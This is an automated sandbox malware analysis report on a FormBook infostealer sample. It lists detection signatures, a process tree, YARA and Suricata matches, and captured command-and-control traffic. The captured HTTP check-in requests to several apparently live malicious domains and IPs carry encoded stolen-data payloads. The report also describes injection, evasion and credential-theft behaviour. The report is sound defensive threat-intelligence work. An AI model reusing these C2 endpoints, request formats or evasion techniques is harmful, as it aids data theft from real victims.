Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r3T-ENQ-O-2024-10856.exe

Overview

General Information

Sample name:r3T-ENQ-O-2024-10856.exe
Analysis ID:1510735
MD5:52ef22af5530fe6362d8638583866c7f
SHA1:bf344e2b57cf1faea3c523212fa0aee1a99a3a6a
SHA256:122c7d2d307d52030eb2021410912b9cf3af46ee3f25a9fd8869f22a8a0baff9
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • r3T-ENQ-O-2024-10856.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe" MD5: 52EF22AF5530FE6362D8638583866C7F)
    • svchost.exe (PID: 6408 cmdline: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rYmePGTGlPk.exe (PID: 3452 cmdline: "C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6604 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • rYmePGTGlPk.exe (PID: 2136 cmdline: "C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5624 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.380000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.380000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.380000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.380000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, ParentProcessId: 3228, ParentProcessName: r3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ProcessId: 6408, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, ParentProcessId: 3228, ParentProcessName: r3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ProcessId: 6408, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-13T12:03:17.133067+020028554651A Network Trojan was detected192.168.2.5494643.33.130.19080TCP
            2024-09-13T12:03:41.188431+020028554651A Network Trojan was detected192.168.2.54946913.228.81.3980TCP
            2024-09-13T12:04:08.333594+020028554651A Network Trojan was detected192.168.2.56130866.81.203.1080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-13T12:03:33.505785+020028554641A Network Trojan was detected192.168.2.54946613.228.81.3980TCP
            2024-09-13T12:03:36.168673+020028554641A Network Trojan was detected192.168.2.54946713.228.81.3980TCP
            2024-09-13T12:03:38.651818+020028554641A Network Trojan was detected192.168.2.54946813.228.81.3980TCP
            2024-09-13T12:04:05.753743+020028554641A Network Trojan was detected192.168.2.56130766.81.203.1080TCP
            2024-09-13T12:04:14.765281+020028554641A Network Trojan was detected192.168.2.561309103.42.108.4680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: r3T-ENQ-O-2024-10856.exeReversingLabs: Detection: 26%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: r3T-ENQ-O-2024-10856.exeJoe Sandbox ML: detected
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rYmePGTGlPk.exe, 00000005.00000002.3345960481.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3345962314.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DD92
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D2044
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D219F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000D24A9
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_000C6B3F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_000C6E4A
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000CF350
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CFD47 FindFirstFileW,FindClose,0_2_000CFD47
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_000CFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0321C0D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0321C0D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax6_2_03209B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h6_2_038104DF

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49468 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49464 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49466 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49467 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49469 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:61309 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:61307 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:61308 -> 66.81.203.10:80
            Source: Joe Sandbox ViewIP Address: 13.228.81.39 13.228.81.39
            Source: Joe Sandbox ViewIP Address: 103.42.108.46 103.42.108.46
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_000D550C
            Source: global trafficHTTP traffic detected: GET /gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd HTTP/1.1Host: www.chamadaslotgiris.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd HTTP/1.1Host: www.mediaplug.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.linkbasic.net
            Source: global trafficDNS traffic detected: DNS query: www.chamadaslotgiris.net
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.mediaplug.biz
            Source: global trafficDNS traffic detected: DNS query: www.independent200.org
            Source: unknownHTTP traffic detected: POST /p5rq/ HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USConnection: closeContent-Length: 209Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.masteriocp.onlineReferer: http://www.masteriocp.online/p5rq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 47 48 53 68 2d 54 74 68 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d Data Ascii: GHSh-Tth=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Fri, 13 Sep 2024 10:04:14 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: rYmePGTGlPk.exe, 00000007.00000002.3347309941.0000000002A81000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.independent200.org
            Source: rYmePGTGlPk.exe, 00000007.00000002.3347309941.0000000002A81000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.independent200.org/yl6y/
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033_w
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2828593534.00000000081FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.3348221729.0000000004638000.00000004.10000000.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3347857669.0000000003608000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000D7099
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000D7294
